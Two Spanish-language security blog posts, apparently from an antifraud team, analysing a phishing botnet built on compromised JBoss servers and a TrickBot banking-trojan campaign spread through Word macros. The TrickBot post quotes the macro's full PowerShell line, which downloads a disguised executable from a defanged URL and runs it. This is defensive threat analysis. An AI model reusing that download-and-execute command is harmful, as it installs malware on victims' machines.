lunes, 12 de diciembre de 2016

Análisis de una Botnet usada para Phishing

Quizás estemos acostumbrados a que los atacantes inviertan en la “compra" de dominios y servidores "bulletproof" para desplegar sus campañas de malware y alargar los cierres todo lo posible. Pero en el mundo del phishing, cuyo rendimiento económico por usuario afectado suele ser menor, podemos entender que utilicen otras técnicas más "económicas" para hacer un despliegue masivo de campañas y prioricen vulnerar o reutilizar servidores ya vulnerados.

Recientemente al analizar y realizar el cierre de las últimas campañas que nos llegaban al departamento antifraude, pudimos comprobar en una de ellas dos patrones comunes: múltiples niveles de redirección y una vulnerabilidad común a todos los servidores utilizados para enmascarar/desplegar el phishing.

Redirecciones

Sobre el primer patrón, es habitual que el atacante utilice algún redirector o acortador de URLs para llevar a los visitantes al phishing, pero esta vez existían múltiples niveles de redirección para filtrar a los posibles afectados, así como bloquear y dificultar los cierres ya que enmascaraban mediante subdominios fraudulentos los verdaderos servidores/IP donde residía la lógica de la campaña.

Principalmente se utilizaba un acortador de URLs (tinyrul, goo.cl o similar) para la campaña de correos masivos que recibían los usuarios. Seguidamente se redireccionaba al visitante a dos dominios fraudulentos, uno donde se filtraba mediante un abultado ".htaccess" a los visitantes por GeoIP (cerca de 5MB) y un segundo para enmascarar la IP del servidor comprometido donde residía el phishing. Éste sería el croquis:

[ Acortador URL ] → [ 1er subdominio redirección ] → [ IP con redirección por GeoIP ] → 
  [ 2º subdominio redirección ]→ [ IP con el phishing final ]

Como ejemplo, estos fueron parte de los subdominios montados y utilizados:

Cada uno de ellos (subdominios) resolvía a una IP distinta a la del dominio principal, donde residía toda la lógica de la campaña.

Servidores vulnerados

El segundo patrón común ha sido el uso de servidores comprometidos, tanto para los dominios de redirección (mediante subdominios montados en cpanels/wordpress comprometidos) como para los servidores que albergaban la lógica de redirección y el servidor final con el phishing.

Es en esta parte donde pudimos comprobar que todos ellos utilizaban JBoss vulnerables. Bien por ser versiones antiguas sin actualizar (como la 5.x) o, sobre todo, por no proteger adecuadamente el acceso a la consola de administración (jmx-console) (CVE-2010-0738) o a ‘invokers’ accesibles como ‘JMXInvokerServlet’(CVE-2007-1036, entre otros).


Pudimos comprobar también que algunos servidores llevaban comprometidos desde hace tiempo, ya que respondían a ciertas peticiones conocidas por un gusano de 2010/2011:


Y para empeorar las cosas, servicios en modo ROOT:



Esto sirvió al atacante para tener, de manera cómoda, una lista de servidores JBoss para su botnet; mediante una variante del script en perl ‘Shellbot/Perlbot’ de origen brasileño utilizado para montar botnets de tipo IRC. Tanto por las modificaciones realizadas, como por la similitud con anteriores campañas que hemos registrado en nuestros sensores, tenemos cierta certeza que el atacante es de origen marroquí.


Como comentábamos en nuestra una-al-día, a día de hoy existen más de 30 servidores comprometidos, aunque están siendo monitorizados desde nuestro departamento para prevenir cualquier apertura de nuevas campañas.



Más información:

Una-al-día: Phishing botnet: nueva campaña que afecta a diversas entidades bancarias europeas



José Mesa Orihuela



martes, 29 de noviembre de 2016

Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido


Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process


Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa
  


Fernando Díaz